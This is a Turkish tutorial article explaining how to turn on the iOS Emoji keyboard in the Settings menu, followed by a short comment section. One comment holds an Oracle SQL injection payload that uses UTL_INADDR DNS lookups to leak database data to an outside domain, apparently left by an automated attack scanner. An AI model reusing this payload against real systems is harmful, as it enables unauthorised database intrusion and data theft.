iOS'ta Emoji nasıl kullanılır?

iPhone'da Emoji nasıl etkinleştirilir? iOs cihazlarda Emoji klavyeyi etkinleştirmek için ne yapmalıyız? Emoji Nasıl aktifleştirilir? İşte cevabı...
17 Haziran 2014 22:01
iOSta Emoji nasıl kullanılır?
Emoji artık küçük simgeleri ile mesajlaşmalarımızın kökleşmiş bir evrensel dili ve ayrılmaz bir parçası haline geldi. Eğer mesajlaşmalarla çok vakit harcayan biriyseniz küçük yüzlerden renkli hayvan ve uçaklara kadar bunları kullanmak isteyebilirsiniz.
 
iOS 5’e kadar sadece üçüncü parti uygulamalar yükleyerek Emojiye ulaşılabiliyorduk. Neyse ki, iOS yüklü cihazlar artık Emoji dahili bir klavye kullanıyor. Ancak her kullanıcı bunun farkında değil. Birçok iPhone kullanıcısı hala Emoji uygulamasını AppStore'dan indirmekte. Oysa buna hiç gerek yok.
 
iOS cihazlara Emoji klavyeyi etkinleştirmek için bu adımları uyguluayın;
 
 
1- Ayarlar’dan Genel’e tıklayın
 
 
 
 
2- Klavye’ye gelin ve altta ‘Klavyeler’e tıklayın
 
 
 
 
3- Yeni Klavye ekle’yi seçin ve Emoji’yi tıklayın
 
 
 
Tebrikler, artık Emoji klavyeni kullanıma hazır. Böylece iMessage, Mail, Notlar veya Twitter gibi birçok uygulamalarda bunları kullanabilirsiniz. Alttaki resimde de gördüğünüz gibi klavyenin sol alt kısmında bulunan küçük dünya simgesine tıkladığınızda Emoji klavye görünecektir.
 
 
Sağ ve sola kaydırdığınızda da diğer simgeleri göreceksiniz.
 
Not: Mesajlaştığınız kişinin Emoji destekli bir cihazı yoksa boş simgeler görecektir.
 
Çeviri: incehesap.com
Etiketler : Apple , iOS , iphone , Uygulamalar
590206
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
11 Ağustos 2016, Perşembe 18:06
Çok tşk işime yaradı
Bu haberler ilginizi çekebilir